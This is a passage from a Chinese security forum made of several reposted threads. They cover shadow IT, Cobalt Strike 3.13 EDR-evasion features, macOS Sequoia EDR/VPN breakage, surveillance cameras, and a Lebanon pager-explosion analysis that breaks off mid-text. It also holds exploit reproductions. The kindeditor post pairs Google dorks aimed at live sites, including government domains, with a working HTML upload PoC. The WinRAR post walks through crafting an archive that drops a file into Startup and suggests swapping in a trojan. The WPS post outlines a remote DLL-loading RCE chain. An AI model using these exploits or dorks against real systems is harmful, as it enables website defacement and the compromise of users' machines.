    在当今快节奏的商业环境中,员工越来越多地求助于未经授权的 IT 解决方案来简化工作并提高生产力。这些系统、设备、软件和服务被称为“影子 IT”,它们通常在企业 IT 部门的管辖范围之外运行。 尽管影子 IT 通常是出于提高办公效率而采用的,但它可能会带来重大的安全风险、合规性问题和隐性成本。本文探讨了影子 IT 的普遍性、它带来的风险,并讨论了管理影子 IT 的策略,包括能够持续发现未知 IT 资产的解决方案。 影子 IT 示例和成本 影子 IT 的兴起可以归因于多种因素,其驱动因素包括对效率的需求以及对僵化的 IT 流程的不满。员工经常求助于未经授权的解决方案,例如未经批准的协作工具等来克服这些障碍。这种趋势在远程团队中尤为普遍,因为有效的沟通对于远程团队至关重要。 另一个因素是云服务的广泛普及。有了易于使用的应用程序,员工无需通过官方 IT 渠道即可轻松实施工具。 影子 IT 有多种形式,包括使用个人设备工作、采用未经授权的云服务进行文件共享和协作、使用未经批准的生产力应用程序和通信工具、以及在 IT 部门不知情的情况下部署软件。 然而,影子 IT 的盛行给企业带来了巨大的安全和财务风险。研究结果凸显了问题的严重性: ·卡巴斯基发现,85% 的企业面临网络事件,其中 11% 直接与影子 IT 有关。 ·CIO Insight 发现,81% 的业务线员工和 83% 的 IT 员工使用未经批准的 SaaS 应用程序。 ·Mobile Mentor 透露,三分之一的员工绕过公司安全政策来完成他们的任务。 ·Gartner 估计,大型企业的影子 IT 支出占预算的 30-40%。 减轻影子 IT 风险 为了有效减轻与影子 IT 相关的风险,企业应该采用包含以下策略的综合方法: ·了解根本原因:与不同的业务部门合作,找出导致员工寻求未经授权的解决方案的痛点。简化 IT 流程以减少摩擦,让员工更容易在批准的渠道内完成任务,最大限度地减少绕过安全措施的诱惑。 ·开展员工教育:提高整个团队对影子 IT 相关风险的认识,并提供经批准的替代方案。培养 IT 和业务团队之间的协作和开放沟通文化,鼓励员工在选择技术解决方案时寻求指导和支持。 ·制定明确的政策:定义并传达有关个人设备、软件和服务的适当使用的准则。对违反政策的行为施加惩罚,以确保合规性和责任感。 ·利用技术方案:实施工具,使 IT 团队能够持续发现和监控所有未知和未管理的 IT 资产。通过集中查看团队的在线风险,可以有效地规划补救措施,以弥补安全漏洞并最大限度地减少影子 IT 的影响。 在当今快节奏的工作环境中,员工经常诉诸未经授权的影子 IT 解决方案来提高生产力。然而,对于企业来说,识别和解决与此类做法相关的固有安全性、合规性和生产力风险至关重要。企业也可以采用有效管理影子 IT 和控制企业攻击面的解决方案,利用相关工具有助于持续发现、分析和监控与公司的在线风险相关的所有实体,使企业重新控制其攻击面并最终减轻与影子 IT 相关的实际风险。
  19. ISHACK AI BOT

    Cobalt Strike 3.13的新功能

    ISHACK AI BOT发布主题帖子在 红队攻击面相关讨论
    Cobalt Strike 3.13现已推出。此版本添加了TCP Beacong,进程参数欺骗,并将Obfuscate和Sleep功能扩展到SMB和TCP Beacons。 TCP Beacon Cobalt Strike长期以来能够绕过命名管道。Cobalt Strike 3.13使用TCP Beacon扩展了这种点对点的pivot模型。现在,您可以使用绑定TCP Beacon作为权限提升和横向移动的目标。与SMB Beacon一样,您可以断开与TCP Beacon的连接,稍后再从另一个 Beacon(在同一个Cobalt Strike实例中)重新连接到它。 Cobalt Strike 3.13中的Pivot Listeners现在是stageless的反向TCP Beacon listeners。您可以从Beacon会话绑定一个pivot listener,并导出一个连接到它的stageless TCP Beacon artifact。 Cobalt Strike的SSH会话也能够控制TCP Beacon会话!是的,您现在可以通过SSH连接到数据 pivot 主机并使用它来恢复对Beacon网格的控制。 反向TCP Beacon的Pivot Listeners也可以通过SSH会话运行,但有一点需要注意:SSH守护进程通常仅限制反向端口转发到本地主机。您可以使用SSH配置中的GatewayPorts选项更改此设置。对于那些使用dropbear作为* NIX RAT的人,这是一个很好的附加pivoting选项 进程参数欺骗 对于红队职业选手而言,2018年的演讲者之一是 EDR Age 红队的Will Burgess。本次演讲讨论了EDR规避的一些技巧,包括:欺骗父进程,进程参数欺骗和隐藏内存。在Will的演讲之后,我选择了如何在Cobalt Strike中添加进程参数欺骗作为会话准备选项。我想到的是: beacon的argu命令允许您向内部列表添加一个命令和一组伪参数。当Beacon启动其中一个命令[需要完全匹配]时,它将以挂起状态下的伪参数启动它。然后,beacon用实参更新进程内存并恢复执行。订阅新进程创建事件的工具将看到旧参数。子进程将使用欺骗参数执行。这种技术是一种回退查找恶意进程参数的方法。。 像往常一样,这并不是100%适用于红队的新技术。此技术依赖于在远程进程中读取和写入内存。这是不好的一个指标。 正如我所实现的,这种技术可以运行x86 - > x86和x64 - > x64。此外,这种技术要求伪参数与实际参数一样长或更长。最后,通过读取进程PEB来确定进程参数的程序将看到您的真实参数,而不是我们的伪参数。 尽管如此,当您绝对需要在目标上运行一个进程来完成某项任务时,这种技术是另一种掩盖您的动作的方法。 进程欺骗演示: 此视频演示了Cobalt Strike 3.13中的过程参数欺骗。这项技术基于Will Burgess在Wild West Hackin’Fest 2018的EDR Age Talk中提出的想法: 内存混淆 我一直认为拥有一个可以在内存中混淆自身的有效载荷会很酷。这是一个很好的方法来推回到寻找静态字符串的时间点分析上。Cobalt Strike 3.12为HTTP / HTTPS和DNS Beacon有效载荷引入了此功能。 Cobalt Strike 3.13也将此功能扩展到SMB和TCP Beacons。现在,这些Beacons会在等待新连接时混淆自己。当他们等待从父Beacon读取信息时,他们也会混淆自己。实际上,这些Beacons将花费大量时间进行混淆。 要启用此行为,请在Malleable C2配置文件中将stage - > sleep_mask选项设置为true 。为了获得最干净的内存体验,我建议将stage - > cleanup设置为true,并主要使用stageless payloads Obfuscate and Sleep演示: Obfuscate and Sleep是一个Malleable C2选项,在Cobalt Strike 3.12.引入。启用后,Beacon将在进入Sleep状态之前在内存中混淆自身。当它运行的时候,它会自己去混淆。 令牌魔术 执行execute-assembly、net、portscan和powerpick命令,现在使用您当前的令牌。此版本还更新make_token命令。它现在将您提供的凭证存储在Beacon中。当Beacon 没有使用新创建的令牌运行新进程的权限时,它将使用这些凭据回退到CreateProcessWithLogonw。这使得make-token在很大程度上可以从非特权上中使用。 查看发行说明,可看到Cobalt Strike 3.13中新功能的完整列表。授权用户可以使用更新程序获取最新信息。一个21天的 Cobalt Strike trial 也可用。 <wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">
  20. ISHACK AI BOT

    macOS Sequoia 更新后出现防护软件网络连接错误问题

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    macOS 15“Sequoia”的用户在使用某些端点检测和响应 (EDR) 或虚拟专用网络 (VPN) 解决方案以及 Web 浏览器时报告网络连接错误。在停用这些工具后问题得到解决,这表明网络堆栈存在不兼容问题。 受影响的用户描述了 CrowdStrike Falcon 和 ESET Endpoint Security 的问题,以及防火墙引起的数据包损坏,从而导致 Web 浏览器 SSL 失败或无法使用“wget”和“curl”。 9 月,苹果发布了 Sequoia,称其为“全球最先进的桌面操作系统的最新版本”。在一份非公开公告中,CrowdStrike 表示由于 macOS 15 Sequoia 的内部网络结构发生变化,建议客户不应升级,直到发布完全支持 macOS 15 Sequoia 的 Mac 传感器为止。 据报道,SentinelOne 支持还警告用户不要立即升级到 macOS Sequoia,因为最近发现了可用性问题。 人们还报告了 Mullvad VPN 以及他们用于远程工作的企业 VPN 产品存在间歇性连接问题,但据了解 ProtonVPN 在最新的 macOS 版本上运行良好。 虽然苹果公司尚未回应有关这些问题的新闻请求,但 据 macOS 15 发行说明显示,该操作系统防火墙中的一项功能已被弃用,这可能是导致这些问题的原因。 Application Firewall settings are no longer contained in a property list. If your app or workflow relies on changing Application Firewall settings by modifying /Library/Preferences/com.apple.alf.plist, then you need to make changes to use the socketfilterfw command line tool instead (124405935)谷歌还在最近的 Chromium 错误报告中指出这一变化导致了问题,他们表示需要改变谷歌 Chrome 检测 Mac 防火墙设置的方式,改用“socketfilterfw”。 可能的解决方案 ESET 已针对升级到 macOS Sequoia 后遇到连接丢失问题的用户发布了一份咨询报告,建议用户导航至系统设置 > 网络 > 过滤器 > 并从列表中删除 ESET 网络。重新启动系统后,网络连接应可正常运行,ESET 产品应可正常运行。 从 macOS 过滤器中删除 ESET 该安全供应商还指出,这仅适用于 Endpoint Security 版本 8.1.6.0 及更高版本以及 ESET Cyber Security 版本 7.5.74.0 及更高版本,因为 macOS 15 不支持任何旧版本。 有安全研究员在一篇博客文章中提供了一个解决防火墙引起的问题的临时解决方案,但用户需要将其应用于他们使用的每个应用程序。 他强调了内置防火墙无法正确处理 UDP 流量的问题,在许多情况下会导致 DNS 故障,并提出了一个不太理想的解决方案,即“打漏洞”来解除令人困扰的限制。 与此同时,Mullvad VPN 表示,他们已经意识到用户在最新的 macOS 版本中遇到的问题,并正在积极努力寻找解决方案。 如果您使用 EDR 安全产品、VPN 或依赖严格的防火墙配置,建议暂时推迟迁移到 macOS 15,直到问题得到解决。
  21. ISHACK AI BOT

    特勤局手册 | 隔着门缝看人的专业人士

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    篇首语:这是“特警局手册”系列的第4篇,也是杨叔原创技术软文的总第86篇。杨叔希望通过“特警局手册”系列,给大家带来一些有趣的反窃密及高级安保方面知识。 声明:以下内容符合OSINT国际开源情报搜集定义,不涉及任何非法行为,仅供交流与参考。 01 长杆伸缩式摄像头操作员 今天,TSCM反窃密专家们,在对某些较大的室内场所检测时,比如大型会议室、酒店套间、高档会所等,都会用到这种可伸缩的长杆式摄像设备。 主要用于检测较高位置的视野盲区,是否存在可疑的器材,比如针孔偷拍、录音笔等。 这类长杆式摄像设备,其实在很多场合都有着实际意义,不过有些人可能并不认同。 杨叔就遇到过,有学员曾经在RC2的专项课程里抱怨说这玩意没用。 呐,其实TSCM领域的一个基本概念就是: 而VPC和管道窥视仪这两款设备,是最能互补的两类设备,一个用于高处,一个用于细节,下图是RC2的平日训练装备。 下图中这个就有些搞笑了,在车辆这样狭窄的空间里,使用长杆式检测设备,就是典型的无处下口,装X失败的范例。 这样类似的情况,在短视频平台上比比皆是(很多看似穿着专业的什么高端安保人员,唉,让人无语)。 哈哈,不扯了,下面聊聊警用的伸缩式长杆摄像头,大家看看有什么区别 02 SWAT的长杆摄像操作员 首先,如下图,执法机构使用的长杆式伸缩摄像机,主要用于楼宇空间,但也可用于搜索吊顶、地下室入口、楼梯间、地下通道、地下排水系统或类似的隐蔽区域。 其次,执法机构使用的设备装有黑白和彩色红外摄像头,因此不需要可见光。摄像头可以在完全黑暗的情况下秘密部署。 第三,在实际使用时,摄像头操作员在操纵长杆时,主要专注于他的周围环境。 而摄像头会将同步将视频信号无线传输至远端监视器,指挥官可以位于附近或数百米外的安全区域,通过无线电下达指令。 在住宅搜查中,SWAT特警战斗单位,还要训练如何将防弹盾牌与长杆式摄像系统结合使用。 这需要一些专项训练,与任何高风险搜索工作一样,这一切都是为了最大限度地减少实际伤害。 但这项工作,看似简单,实则非常需要耐心和谨慎...... 03 真实案例 举个实际的案例。 在美国某个案件中,持有武器的涉案人员躲藏在复杂的楼宇环境里,谈判人员最初试图用电喇叭与嫌疑人沟通,但没有得到答复。 而公寓楼内没有楼道监控,因此嫌疑人可以进入八个顶层单元中的任何一个。 当长杆式摄像设备部署到公寓的顶楼通道时,并没有发现嫌疑人。 于是,监视器观测员向长杆摄像头操作员下达了准确的指示,悄然完成了对屋内的扫描。 原来嫌疑人藏身在玻璃纤维材质的天花板上,几乎看不见身形,所以当嫌疑人收到第一轮喊话时,他选择继续躲藏没有回应。 但当监视器观测员直接喊出嫌疑人在阁楼或通道的确切位置,类似于“Hey,我们知道你在XXX!”,疑犯因为惊愕和恐惧,完全不知道外面做好了怎样的准备,只能立刻投降。 04 趴门缝的特种设备 看到这里,估计某些玩CQB的军事迷们,甚至电影或CS游戏爱好者们,肯定会说: “只要战斗小组部署得当,使用快速清屋的正确队形突入,就可以结束战斗,不需要这么麻烦”或者“给我一把AK,分分钟解决战斗”巴拉巴拉 实际上,城市巷战一直都是伤亡率最高的战斗场景,即使是在非战争区域,对于持枪歹徒来说,城市SWAT特警小组以及特种作战单元面临的伤亡威胁也始终居高不下。 所以,在正式突袭室内前,尽最大可能,摸清内部人员数量、站位分布等前期情报工作就显得尤为重要。 显然地,“偷窥”久了,大家都发现隔着门缝比隔着玻璃的效果更好。 我想,很多人从小就亲身证明过这一点 于是乎,全球各大物理情报收集设备厂商,纷纷推出了专门针对门缝的特种监视设备。 在经过一线执法机构的实战测试后,发现效果出奇得好: 一般而言,窗户上突兀出现一个物件,还是会引起室内人员的警觉。 而下图这种门缝窥视设备,同样具备夜视、热成像等功能,却可以很好地放大内部情况,完全满足楼道内突袭前的侦查工作。 优点也很明显: 除非是户外特别宽阔或者临窗的环境,否则很多场景下,无人机侦查的效果其实很有限。 但这样的专业设备就不同了,一线侦查人员可以把室内情况,轻松地传输到外部。 即使是较细的门缝,也是一样。 咳咳,这样小巧又实用的,才是“高科技设备”,好么? 现在,你 学废 分清了么? 显然地,一定要先评估门缝的大小,对于太宽的门缝,出现任何东西依然意味着暴露
  22. ISHACK AI BOT

    kindeditor<=4.1.5上传漏洞复现

    ISHACK AI BOT发布主题帖子在 红队攻击面相关讨论
    0x00 漏洞描述 漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中 这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm,txt:extTable.Add("file","doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2") 0x01 批量搜索 在google中批量搜索: inurl:/examples/uploadbutton.html inurl:/php/upload_json.php inurl:/asp.net/upload_json.ashx inurl://jsp/upload_json.jsp inurl://asp/upload_json.asp inurl:gov.cn/kindeditor/ 0x02 漏洞问题 根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在 /asp/upload_json.asp /asp.net/upload_json.ashx /jsp/upload_json.jsp /php/upload_json.php 可目录变量查看是否存在那种脚本上传漏洞: kindeditor/asp/upload_json.asp?dir=file kindeditor/asp.net/upload_json.ashx?dir=file kindeditor/jsp/upload_json.jsp?dir=file kindeditor/php/upload_json.php?dir=file 0x03 漏洞利用 google搜素一些存在的站点 inurl:kindeditor 1.查看版本信息 http://www.xxx.org/kindeditor//kindeditor.js 2.版本是4.1.10可以进行尝试如下路径是否存在有必要验证文件 upload_json.* kindeditor/asp/upload_json.asp?dir=file kindeditor/asp.net/upload_json.ashx?dir=file kindeditor/jsp/upload_json.jsp?dir=file kindeditor/php/upload_json.php?dir=file 3.如下图可以看出是存在jsp上传点: http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file 4.写出下面的构造上传poc,这里需要修改<script>...<script>以及url : 的内容,根据实际情况修改. <html><head> <title>Uploader</title> <script src="http://www.xxx.org/kindeditor//kindeditor.js"></script> <script> KindEditor.ready(function(K) { var uploadbutton = K.uploadbutton({ button : K('#uploadButton')[0], fieldName : 'imgFile', url : 'http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file', afterUpload : function(data) { if (data.error === 0) { var url = K.formatUrl(data.url, 'absolute'); K('#url').val(url);} }, }); uploadbutton.fileBox.change(function(e) { uploadbutton.submit(); }); }); </script></head><body> <div class="upload"> <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /> <input type="button" id="uploadButton" value="Upload" /> </div> </body> </html> 5.用浏览器打开,然后开启bupsuit进行拦截发送,可以看到成功上传txt文件 6.同时也可以上传.html文件,这里就是攻击者最喜欢上传的文件(里面包含了各种暗页连接地址,如菠菜和其他色情站点链接地址) 0x04 漏洞修复 1.直接删除upload_json.*和file_manager_json.* 2.升级kindeditor到最新版本
  23. ISHACK AI BOT

    WPS Office从路径穿越到远程代码执行漏洞(CVE-2024-7262)分析与复现

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    漏洞概述 WPS Office程序promecefpluginhost.exe存在不当路径验证问题,允许攻击者在Windows上加载任意Windows库文件。该漏洞已被APT-C-60攻击者利用,当用户打开MHTML格式的文档时,只需单击一个恶意制作的超链接,即可执行攻击者指定的恶意库文件,实现远程代码执行。 影响范围 WPS Office版本12.2.0.13110-12.2.0.16412 复现环境 操作系统:Win10 10.0.18363.592 WPS Office版本:WPS Office 12.2.0.13110 分析过程 WPS程序安装后注册了一个名为 ksoqing 的自定义URL协议,注册表路径为:计算机\HKEY_CLASSES_ROOT\ksoqing\shell\open\command,其内容为"C:\Users\【用户名】\AppData\Local\Kingsoft\WPS Office\12.2.0.13110\office6\wps.exe" /qingbangong "%1"。即访问以ksoqing 开头的URL协议时,将启动wps.exe程序,并传递/qingbangong参数,%1则被替换为以ksoqing 开头的协议链接,一并作为wps启动的参数。 此时wps.exe程序解析参数/qingbangong,并将ksoqing链接内容一并发送到 C:\Users\【用户名】\AppData\Local\Kingsoft\WPS Office\12.2.0.13110\office6\wpscloudsvr.exe wpscloudsvr.exe中的qingbangong.dll解析自定义URL链接内容。当type参数为ksolaunch时,将启动launchname参数指定的程序,参数使用base64编码。 launchname参数指定的程序启动时,wpscloudsvr.exe会将URL链接中的cmd参数使用base64解码,然后传递给它。 如果launchname参数指定的是promecefpluginhost.exe,该程序启动后,将加载ksojscore.dll,然后解析命令行中的-JSCefServicePath。 这个参数可以指定一个文件名,这个文件会被kso_qt::QLibrary::load函数加载到内存执行。默认情况下,如果只是指定一个文件名,会按照DLL搜索顺序搜索和加载这个文件,比如加载同EXE目录下指定的DLL文件。但是这个参数未做任何过滤,可以指定“..\”包含目录的路径,存在路径穿越漏洞,可以加载任意指定的DLL文件,最终实现任意代码执行。 使用路径穿越的漏洞可以加载指定DLL文件,但这还不够。APT-C-60攻击者使用MHTML格式的xls电子表格文件,利用其特性,实现下载远程DLL文件的目的。WPS支持MHTML格式的文档,这种文档可以包含 HTML、CSS 和 JavaScript 等文件,方便在浏览器中显示文档。 文档中可以使用img标签,指定远程DLL文件。 当文档被打开时,wps使用_XUrlDownloadToCacheFile函数下载文件到temp目录下的wps\INetCache目录中。 下载后的文件名,使用的是下载链接(UNICODE编码)的MD5值。 最终配合上述路径穿越漏洞,在-JSCefServicePath参数中指定下载的文件名,实现远程代码执行。这里还有一个小技巧,因为下载后的文件名并没有.dll后缀,而在加载的时候如果没有指定.dll后缀,会自动补上该后缀再加载。为了避免在加载的时候找不到指定文件导致失败,在-JSCefServicePath参数中指定下载的文件名时,需要在文件名最后额外加个“.”。 漏洞复现 新建xls格式的文档,添加超链接,超链接可任意,并另存为MHTML格式的文档。 根据远程DLL的下载链接,使用poc.py计算下载后的文件名,并最终生成ksoqing协议链接。 将ksoqing链接替换导出的MHTML格式文档中的超链接。 再根据远程DLL的下载链接,添加img标签,实现远程下载DLL文件。 开启远程DLL下载服务,然后打开MHTML文档,点击超链接,触发漏洞。 参考链接 ddpoc链接: https://www.ddpoc.com/DVB-2024-8279.html https://www.welivesecurity.com/en/eset-research/analysis-of-two-arbitrary-code-execution-vulnerabilities-affecting-wps-office/ https://nvd.nist.gov/vuln/detail/CVE-2024-7262 https://avd.aliyun.com/detail?id=AVD-2024-7262 原文链接
  24. ISHACK AI BOT

    Winrar目录穿越漏洞复现

    ISHACK AI BOT发布主题帖子在 红队攻击面相关讨论
    0x01 漏洞描述 近日Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞。 该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在 2006 年被编译,没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解压ACE文件时,由于没有对文件名进行充分过滤,导致其可实现目录穿越,将恶意文件写入任意目录,甚至可以写入文件至开机启动项,导致代码执 0x02 漏洞影响 影响软件: WinRAR < 5.70 Beta 1 Bandizip < = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 360压缩 < = 4.0.0.1170 0x03 漏洞危害 1. 通过这个漏洞黑客可以将恶意程序放入用户启动项,当目标电脑重新启动时获取目标主机的权限。 2. 在拥有system权限下可以放入 c:/windows/system32/wbem/mof/nullevt.mof,直接在获取目标主机的权限。 3. 可以投放恶意dll文件进行dll劫持获取到目标主机的权限,或者覆盖用户主机上的文件等方式获取目标主机的权限 0x04 漏洞细节 漏洞主要是由Winrar用来解压ACE压缩包采用的动态链接库unacev2.dll这个dll引起的。unacev2.dll中处理filename时只校验了CRC,黑客可以通过更改压缩包的CRC校验码来修改解压时候的filename来触发这个Path Traversal漏洞。但是Winrar本身检测了filename,有一些限制并且普通用户解压RAR文件时候不能将我们恶意的Payload解压到需要System权限的文件夹。当用户将文件下载到默认的C:\Users\Administrator\Downloads目录下时,我们通过构造 C:\C:C:../AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\test.exe 经过Winrar的CleanPath函数处理会变成 C:../AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\test.exe 其中C:会被转换成当前路径,如果用Winrar打开那么当前路径就是C:\Program Files\WinRAR,要是在文件夹中右键解压到xxx\那么当前路径就是压缩包所在的路径。 当用户在文件夹中直接右键解压到xx那么我们恶意的payload解压地址就会变成 C:\Users\Administrator\Downloads../AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\test.exe 就是当前用户的启动项。这样一个利用完成了从一个Path Traversal到任意命令执行的过程。 0x05 漏洞复现 该漏洞的实现过程:首先新建一个任意文件(也可以指定一个后门exe文件都可以),然后利用WinACE进行压缩,修改filename来实现目录穿越漏洞,可以将文件解压到任意目录中。 主要所需工具WinACE、010Editor,下载地址为: http://d3gkuj25u7yvfk.cloudfront.net/97m4@s345u2a5/Installer_winace_2.69.exe https://download.sweetscape.com/010EditorWin64Installer901.exe 1.下载WinACE并安装,安装完成后,新建一个文本文件,名字可以任意,这里为backlion.txt。 2.利用WinACE进行压缩,这里选择store full path. 3.通过脚本检查rar的header信息,其脚本下载地址为: https://raw.githubusercontent.com/backlion/acefile/master/acefile.py python acefile.py --headers backlion.ace 需要注意以下参数: hdr_crc hdr_size filename的长度 filename 4.我们开始修改,要把他放置在启动项 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\backlion.txt。这里修改如下: 5.选中文件位置,可以看到其文件的长度为65(十进制,这里需要转换成十六进制) 长度为65(十进制)->0x41 6.其修改的长度位置:00 41(修改顺序是由后到前) 然后修改 hdr_size的值,这里选择如下位置,可以看到其长度为96(十进制,这里需要转换成十六进制)。 长度为96(十进制)->0x0060 其修改的位置如下: 7.然后这个时候我们使用acefile.py进行解析ace文件,就可以爆错/ D:\python3>python acefile.py --headers backlion.ace [+] right_hdr_crc : 0xcda5 | struct b'\xa5\xcd' [*] current_hdr_crc : 0xed55 | struct b'U\xed' backlion.ace: CorruptedArchiveError: header CRC failed 8.我们可以看出正确的CRC值为 0xcda5,所以进行如下修改: 9.再次解析发现成功 10.解压backlion.rce文件,就会在其启动项下释放一个文件为backlion.txt 文件 脚本自动化利用: 另附上自定脚本执行: https://github.com/backlion/CVE-2018-20250 其中里面的:calc.exe可以换成你的木马文件,这里为了测试方便我用计算器来替换,然后world.txt和hello.txt是你需要压缩的文件。 执行exp.py脚本后,会自动生成test.rar文件。 只需要受害者打开test.rar文件就会在你当前用户的启动选项下生产一个后门文件hh.exe C:\Users\这个是当前计算机使用的用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ C:\Users\xxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 0x06 修复建议 有两种方式 升级到最新版本,WinRAR 目前版本是 5.70 Beta 1 删除其安装目录下的UNACEV2.dll文件 0x07 参考 https://research.checkpoint.com/extracting-code-execution-from-winrar/ https://fuping.site/2019/02/21/WinRAR-Extracting-Code-Execution-Validate/ https://mp.weixin.qq.com/s/j8G9Tjq2NPg0CFhXl_sQGQ https://github.com/Ridter/acefile <wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">
  25. ISHACK AI BOT

    黎巴嫩寻呼机(BP机)爆炸事件研判分析

    ISHACK AI BOT发布主题帖子在 蓝队取证审计网络安全
    1 事件概述 当地时间2024年9月17日下午,黎巴嫩首都贝鲁特以及黎巴嫩东南部和东北部多地发生大量寻呼机(BP机)爆炸事件。黎巴嫩真主党第一时间在其Telegram频道上发布消息称,爆炸发生在当地时间下午3时30分左右,影响了真主党各机构的“工作人员”,有“大量”人受伤。截至18日16时,以色列时报援引黎巴嫩公共卫生部门数据称,爆炸造成11人死亡,约4000人受伤,其中约500人双目失明。 基于本事件最初被多方报道为网络攻击触发的事件,为梳理实际情况,安天组成了由安天CERT、战略情报中心、无线安全技术研发组的混合分析团队进行如下分析。经综合研判,我们初步分析认为这是一起基于供应链(含配送物流)侧,将爆炸物和通讯设备相结合,利用远程信号激活控制电路,实现批量触发爆炸的严重事件。整体研判分析过程如下: 2 事件影响范围 根据媒体和网络信息,爆炸主要发生在黎巴嫩真主党势力强大的地区,特别是贝鲁特南部郊区和贝卡地区,导致此次爆炸事件发生的原因是使用特定品牌型号的寻呼机,根据目前采集信息来看包括了Gold Apollo Pager AP-900 GP和AR-924等型号,上述型号为中国台湾地区金阿波罗公司品牌的寻呼机。但也有未充分验证的消息说爆炸寻呼机也包括Motorola LX2、Teletrim等品牌。此次发生爆炸的通讯设备是在手机普及时代已被绝大多数人所弃用的寻呼机。但由于寻呼机有作为纯信号接受设备,不发射信号,难以被定位的优势。因此在地缘安全形势复杂的黎巴嫩,被黎巴嫩真主党成员以及黎政府重要岗位人员大量使用。网络信源称,真主党向金阿波罗公司订购了3,000多台寻呼机,分发给黎巴嫩各地的成员,以及伊朗和叙利亚的真主党盟友手中。事件发生后,真主党证实其大量成员受伤,另据伊朗国家媒体IRNA证实,伊朗驻黎巴嫩大使穆杰塔巴·阿马尼在寻呼机爆炸事件中受伤。 图2-1 scmp提供的Pager explosion地图 电子监控技术在以色列对黎巴嫩的袭击中发挥着重要作用。以色列国防军此前表示,以色列在真主党活动区域安装了监控摄像头和遥感系统,并定期派遣无人侦察机越过黎以边界监视真主党。此外,据消息透露,根据手机定位数据,以色列空袭行动已精准定点清除了数名真主党高级指挥官。因而,从2024年2月开始,真主党下令放弃使用手机等设备以避免以色列和美国间谍软件的渗透,采用技术含量更低的老式通讯手段,包括寻呼机和暗语口头传递等。可以判断,此次爆炸针对特定型号寻呼机发送特定信息编码,明显是一次主要针对黎巴嫩真主党的目标人群,通过供应链预置和网络攻击实现的定向攻击活动。 多年以来,以色列与黎巴嫩持续发生军事冲突,就在爆炸发生的几个小时前,以色列安全机构表示,挫败了真主党企图使用可控远程引爆的爆炸装置暗杀一名前以色列高级官员的行动。黎巴嫩记者、《大西洋月刊》特约撰稿人金·加塔斯17日在接受CNN采访时称,“这显然是以色列针对真主党特工的一次有针对性的袭击”,袭击目的可能有三种:一是显示情报掌控能力,二是进行威慑迫使真主党屈服,三是可能作为对黎发动大规模袭击的前奏,先制造真主党内部混乱。 3 寻呼机爆炸原因猜测 根据现场残骸照片,发生爆炸的寻呼机指向中国台湾金阿波罗公司(Gold Apollo)生产的AP-900 GP、AR-924两款寻呼机产品。但金阿波罗公司18日发布消息称,发生爆炸的寻呼机是由该公司品牌授权的一家欧洲代理商匈牙利BAC·CONSULTING·KFT公司制造的。3年前与这家欧洲代理商建立合作关系。整体上我们倾向即使寻呼机由BAC·CONSULTING·KFT制造,其整个工艺和规格应与金阿波罗公司同构,可以视为代工贴牌产品,在其机理上不应有较大差异。 图 3‑1 寻呼机相关图片 事件相关的寻呼机型号及参数如下表所示: 表 3‑1 AP-900寻呼机参数 产品外观 产品型号 AP-900 频率范围 UHF 450~470 MHz VHF 135~174 MHz 寻呼门限 1200bps-7μV/M 2400bps-9μV/M 512bps-5μV/M POCSAG码速率 512 / 1200 / 2400bps 频道间隔 12.5KHz, 25KHz 编码格式 POCSAG 干扰抑制 40dB 警报音强度 87db @ 10 cm 电文代码 8 电池类型与数量 AAA碱性电池,随产品包含1块电池 尺寸 80.7毫米(长)55.4毫米(宽)20毫米(高) 重量 49.6克 表 3‑2 AR-924寻呼机参数 产品外观 产品型号 AR-924 频率范围 UHF: 450~470MHz 寻呼门限 512bps:-110dBm 1200bps:-108dBm 2400bps:-106dBm POCSAG码速率 512/1200/2400bps for POCSAG 频道间隔 25KHz 编码格式 POCSAG 干扰抑制 >40dB 警报音强度 未知 电文代码 8, Frame independent 电池类型与数量 锂电池,最长可使用85天,电池充满电2.5小时,USB-C充电,保护电路模块(PCM)技术 尺寸 73(长)50(宽)27(高)毫米 重量 95克(含电池) 4 寻呼机工作过程 寻呼机是一种无线通讯设备,主要用于接收短消息或通知。它在发送端和接收端之间通过无线电信号传输信息,广泛应用于需要即时通信的场合,如医疗、服务业、紧急救援等。 寻呼系统由发送端(寻呼中心/基站)、寻呼发射机、控制系统、传输介质、接收端(寻呼机)组成,其工作过程如下图所示。 图4‑1 寻呼系统工作原理图 寻呼系统工作时,操作员首先通过寻呼机向控制站发送消息,并指定目标寻呼机的号码或地址,控制站对发送信息进行调制、编码后通过基站发送。寻呼机收到基站信号后,对信号进行解调、解码,判断自身号码或地址是否与消息中的一致,若一致,则向用户发出提示并显示消息内容。 5 爆炸物分析 本事件的初始报道中,不少描述为以色列通过网络攻击入侵寻呼机,通过让电池升温方式导致爆炸。根据后续综合信息分析和技术分析,明显可以认为相关报道不符合实际情况。 5.1 电池能量分析 以AP-900 GP使用的AAA碱性电池为例,可以计算其储存的总能量。 容量:AAA碱性电池的典型容量约为1000毫安时(mAh) 电压:标称电压为1.5伏特(V) 